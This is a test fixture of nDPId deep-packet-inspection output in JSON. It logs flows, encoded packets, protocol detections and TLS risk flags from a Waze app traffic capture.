+00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1435587868123,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1435587868123,"pkt":"ABoRAAACABoRAAABCABFAABNMsNAAEAGQsQKECWdriXnUaUQFGaA18okWhY9doAYAVcnqgAAAQEICgAIa9FBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868632,"flow_last_seen":1435587868632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868632,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1435587868632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868632,"pkt":"ABoRAAACABoRAAABCABFAAA814xAAEAGPpQKCAABNubjrLHZAFCatruPAAAAAKAC\/\/+u6AAAAgQFtAQCCAoACGwDAAAAAAEDAwg="} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1435587868633,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868633,"pkt":"ABoRAAACABoRAAABCABFAAAodHNAABAG0cE25uOsCggAAQBQsdllSURwmra7kFAS\/\/\/ZDAAA"} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868634,"flow_last_seen":1435587868634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868634,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1435587868634,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868634,"pkt":"ABoRAAACABoRAAABCABFAAA8jYZAAEAGx0MKCAABLjOtto0EAbvOcuGFAAAAAKAC\/\/+3SQAAAgQFtAQCCAoACGwDAAAAAAEDAwg="} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1435587868635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868635,"pkt":"ABoRAAACABoRAAABCABFAAAodHRAABAGEGouM622CggAAQG7jQQxjR56znLhhlAS\/\/87IAAA"} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868635,"flow_last_seen":1435587868635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868635,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1435587868635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868635,"pkt":"ABoRAAACABoRAAABCABFAAA8H6lAAEAGNSEKCAABLjOtto0GAbtbbHOtAAAAAKAC\/\/+YJQAAAgQFtAQCCAoACGwEAAAAAAEDAwg="} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1435587868644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868644,"pkt":"ABoRAAACABoRAAABCABFAAAodHVAABAGEGkuM622CggAAQG7jQakk4xSW2xzrlAS\/\/87HgAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1435587868644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868644,"pkt":"ABoRAAACABoRAAABCABFAAAo141AAEAGPqcKCAABNubjrLHZAFCatruQZUlEcVAQ\/\/\/ZDQAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1435587868645,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868645,"pkt":"ABoRAAACABoRAAABCABFAAAojYdAAEAGx1YKCAABLjOtto0EAbvOcuGGMY0ee1AQ\/\/87IQAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1435587868645,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868645,"pkt":"ABoRAAACABoRAAABCABFAAAoH6pAAEAGNTQKCAABLjOtto0GAbtbbHOupJOMU1AQ\/\/87HwAA"} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868632,"flow_last_seen":1435587868906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1435587868906,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868632,"flow_last_seen":1435587868910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1435587868910,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868996,"flow_last_seen":1435587868996,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868996,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1435587868996,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868996,"pkt":"ABoRAAACABoRAAABCABFAAA8cVdAAEAGm2kKCAABrcJ2MI7pAburox1\/AAAAAKAC\/\/9UDAAAAgQFtAQCCAoACGwoAAAAAAEDAwg="} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1435587868998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868998,"pkt":"ABoRAAACABoRAAABCABFAAAodHhAABAGyFytwnYwCggAAQG7julUXOKAq6MdgFAS\/\/\/xMQAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1435587869002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869002,"pkt":"ABoRAAACABoRAAABCABFAAAocVhAAEAGm3wKCAABrcJ2MI7pAburox2AVFzigVAQ\/\/\/xMgAA"} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868634,"flow_last_seen":1435587869002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587869002,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868996,"flow_last_seen":1435587869054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1435587869054,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868635,"flow_last_seen":1435587869106,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587869106,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868996,"flow_last_seen":1435587869107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1435587869107,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"23f1f6e2f0015c166df49fdab4280370","unsafe_cipher":2,"cipher":"TLS_ECDHE_RSA_WITH_RC4_128_SHA"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587869162,"flow_last_seen":1435587869162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587869162,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1435587869162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587869162,"pkt":"ABoRAAACABoRAAABCABFAAA8XmhAAEAGt7gKCAABNubjrLHgAFDjpDJQAAAAAKAC\/\/\/u\/QAAAgQFtAQCCAoACGw4AAAAAAEDAwg="} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1435587869163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869163,"pkt":"ABoRAAACABoRAAABCABFAAAodIRAABAG0bA25uOsCggAAQBQseAcW82v46QyUVAS\/\/\/ZBQAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1435587869163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869163,"pkt":"ABoRAAACABoRAAABCABFAAAoXmlAAEAGt8sKCAABNubjrLHgAFDjpDJRHFvNsFAQ\/\/\/ZBgAA"} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587869162,"flow_last_seen":1435587869165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1435587869165,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587869162,"flow_last_seen":1435587869166,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1435587869166,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":66,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868635,"flow_last_seen":1435587869425,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587869425,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} +01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868634,"flow_last_seen":1435587869476,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1435587869476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587868635,"flow_last_seen":1435587869477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1435587869477,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587867755,"flow_last_seen":1435587871459,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1435587871459,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":200,"content_type":"application\/octet-stream","user_agent":"Android"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871656,"flow_last_seen":1435587871656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871656,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1435587871656,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871656,"pkt":"ABoRAAACABoRAAABCABFAAA8\/jRAAEAGF+wKCAABNubjrLHiAFBcJZMGAAAAAKAC\/\/8UywAAAgQFtAQCCAoACG0yAAAAAAEDAwg="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1435587871657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871657,"pkt":"ABoRAAACABoRAAABCABFAAAodJ1AABAG0Zc25uOsCggAAQBQseKj2mz5XCWTB1AS\/\/\/ZAwAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1435587871657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871657,"pkt":"ABoRAAACABoRAAABCABFAAAo\/jVAAEAGF\/8KCAABNubjrLHiAFBcJZMHo9ps+lAQ\/\/\/ZBAAA"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871658,"flow_last_seen":1435587871658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871658,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1435587871658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871658,"pkt":"ABoRAAACABoRAAABCABFAAA8NxhAAEAG3wgKCAABNubjrLHkAFDBi1oqAAAAAKAC\/\/\/oPgAAAgQFtAQCCAoACG0yAAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1435587871659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871659,"pkt":"ABoRAAACABoRAAABCABFAAAodJ5AABAG0ZY25uOsCggAAQBQseQ+dKXVwYtaK1AS\/\/\/ZAQAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1435587871660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871660,"pkt":"ABoRAAACABoRAAABCABFAAAoNxlAAEAG3xsKCAABNubjrLHkAFDBi1orPnSl1lAQ\/\/\/ZAgAA"} 